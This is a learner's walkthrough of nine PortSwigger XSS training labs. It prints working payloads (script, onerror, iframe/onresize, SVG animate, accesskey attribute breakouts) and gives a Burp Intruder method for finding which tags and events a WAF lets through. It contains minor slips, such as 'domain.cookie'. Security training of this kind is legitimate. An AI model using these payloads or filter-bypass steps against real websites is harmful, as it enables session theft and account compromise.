Cross-site scripting contexts WalkThrough — PortSwigger Labs — Part 1
Hey my friends, When I started solving XSS labs on portswigger, I had a problem that I wasn’t good enough in js, so when I finished the labs I just decided to try to explain and demystify payloads, Some of these labs were already clear so I tried to comment on some steps only, Finally I hope this article will help you.
In this part, I will solve the first 9 labs only so let's start.
Lab 1# Reflected XSS into HTML context with nothing encoded
We notice that there is a search box so let's try to test it, If it’s vulnerable to xss or not.
- I’ll try my payload
0xmkr24</>
and see if it is reflected in the page source.
- there is no filter so try our payload
<script>alert(1)</script>
and congrats lab has been solved.
Lab 2# Stored XSS into HTML context with nothing encoded
in this lab, we’ll notice that its a blog
open any post and you’ll see that there is a form
fill this form and see if your data is reflected in page source
I notice there’s no filter in the comment box so let’s try our payload in it <script>alert(1)</script>
and congrats lab has been solved.
Lab 3: Reflected XSS into HTML context with most tags and attributes blocked
we have a search box so let's try to inject any payload like 0xmkr</>
we notice that <
,/>
not filtered so try <script>alert(1)</script>
Unfortunately <script>
is filtered so let's try another payload like <img src=1 onerror=print()>
but it’s the same output, I’ll use Burp Intruder to test which tags and attributes are being blocked.
Now open burp, send a request from the search box and intercept it from burp, then send this request to an intruder
I have got these screenshots from the internet because I’m lazy to take them, forgive me that :)
Now follow instructions from the Solution section
- In Burp Intruder, in the Positions tab, click “Clear §”. Replace the value of the search term with:
<>
- Place the cursor between the angle brackets and click “Add §” twice, to create a payload position. The value of the search term should now look like this:
<§§>
- Visit the XSS cheat sheet and click “Copy tags to clipboard”.
- In Burp Intruder, in the Payloads tab, click “Paste” to paste the list of tags into the payloads list. Click “Start attack”.
- When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the
body
payload, which caused a 200 response, This indicates that the WAF allows this tag, and perhaps we can use it for our exploitation process. - Go back to the Positions tab in Burp Intruder and replace your search term with:
<body%20=1>
, Now we know we can use thebody
tag, we need to know which events we can use. - Place the cursor before the
=
character and click "Add §" twice, to create a payload position. The value of the search term should now look like this:<body%20§§=1>
- Visit the XSS cheat sheet and click “copy events to clipboard”.
- In Burp Intruder, in the Payloads tab, click “Clear” to remove the previous payloads. Then click “Paste” to paste the list of attributes into the payloads list. Click “Start attack”.
- When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the
onresize
payload, which caused a 200 response. - Go to the exploit server and paste the following code, replacing
your-lab-id
with your lab ID:<iframe src="https://your-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
- Click “Store” and “Deliver exploit to the victim”.
But before that let’s break down this payload
ifram
tag embeds another HTML page into a current page.onresize
attribute is an event attribute that executes a javascript when you resize the browser window.onload
event attribute executes the javascript when the webpage is loaded.
What’s happening now? when you visit the website “https://your-lab-id.web-security-academy.net/exploit”, you will see a small white box on the web page.
When the web page is loaded, this triggers the onload event to execute the javascript: this.style.width=‘100px’,
meaning the width of the small white box you see will be adjusted to 100 pixels which is small.
When the width is adjusted, this triggers the next event which is the onresize
event. This will execute the javascript: alert(document.cookie)
.
The alert(document.cookie) allows you to read the cookies associated with the document on that website.
Next, click view exploit to go to the exploit link.
Once you are at the web page, you will see a white box created using the iframe tag.
Immediately, it will change to a smaller width size (100px) and this will activate the “onresize
”event, which will execute the alert function, showing a pop-up message as shown below.
There isn’t any message shown as there is no cookie associated with the document on that webpage.
Lab 4: Reflected XSS into HTML context with all tags blocked except custom ones
Go to the exploit server and paste the following code, replacing your-lab-id
with your lab ID:
<script> location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script>
# decode
<xss id=x onfocus=alert(domain.cookie) tabindex=1>
Lab 5: Reflected XSS with event handlers and href attributes blocked
i tried many payloads but its tag was blocked so I check Solution and used its payload, now let’s break down it
?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
Decode
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>
<a>
creates a hyperlink to web pages- The SVG
<animate>
element provides a way to animate an attribute of an element over time. <attributeName>
The attributeName attribute indicates the name of the CSS property or attribute of the target element that is going to be changed during an animation.
Example of svg animate
<svg viewBox="0 0 10 10" xmlns="http://www.w3.org/2000/svg">
<rect width="10" height="10">
<animate attributeName="rx" values="0;5;0" dur="10s" repeatCount="indefinite" />
</rect>
</svg>
Lab 6: Reflected XSS with some SVG markup allowed
we will make the same steps in lab 3, we will find that <svg>
, <animatetransform>
, <title>
, and <image>
tags, which received a 200 response.
then go back to the Positions tab in Burp Intruder and replace your search term with: <svg><animatetransform%20=1>
Place the cursor before the =
character and click "Add §" twice to create a payload position. The value of the search term should now be: <svg><animatetransform%20§§=1>
In Burp Intruder, in the Payloads tab, click “Clear” to remove the previous payloads. Then click “Paste” to paste the list of attributes into the payloads list. Click “Start attack”.
When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response, except for the onbegin
payload, which caused a 200 response.https://your-lab-id.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
Lab 7# Reflected XSS into attribute with angle brackets HTML-encoded
try to submit any random input like 0xmkr24
and open page source to find how this input was reflected
we need to close double-quotes value “
and after that, we can use any event we need like onmouseover
, onclick
etc, you can found this event in the Cross-site scripting (XSS) cheat sheet.
I’ll use the second double quote to don’t break
our payload will be like this value=”event=”alert(1)”>
and now I’ll use this payload “onclick=”alert(1)
, now when you click on the search box, “1” will popup, and lab will be solved
Lab 8# Stored XSS into anchor href attribute with double quotes HTML-encoded
there is a blog when opening it, I found a form section, try to fill its fields with random values
and post it, then return to this page, you will find your comment is reflected
open page source and I notice that the data in website input has been reflected inside an anchor href
attribute.
I will try javascript:alert(1)
in website
and post it then return to a page again, when I click on website URL the alert happens
open page source to see how it reflected
Lab 9# Reflected XSS in canonical link tag
nothing on the home page so let’s see the page source, I notice the URL of the website is reflected in the page source
I try to add ?
in URL and wow it’s reflected too
I try some payloads but it didn’t work with me if you find any payload work, tell me.
so I use the payload in Solution, let’s break down it
You can exploit this behavior using access keys and user interaction on Chrome
Access keys allow you to provide keyboard shortcuts that reference a specific element.
The access key attribute allows you to define a letter that, when pressed in combination with other keys (these vary across different platforms), will cause events to fire
?%27accesskey=%27x%27onclick=%27alert(1)
Decode
?'accesskey='x'onclick='alert(1)
- This sets the X key as an access key for the whole page. When a user presses the access key, the alert function is called.
- To trigger the exploit on yourself, press one of the following key combinations: On Windows: ALT+SHIFT+X ,On MacOS CTRL+ALT+X, On Linux: Alt+X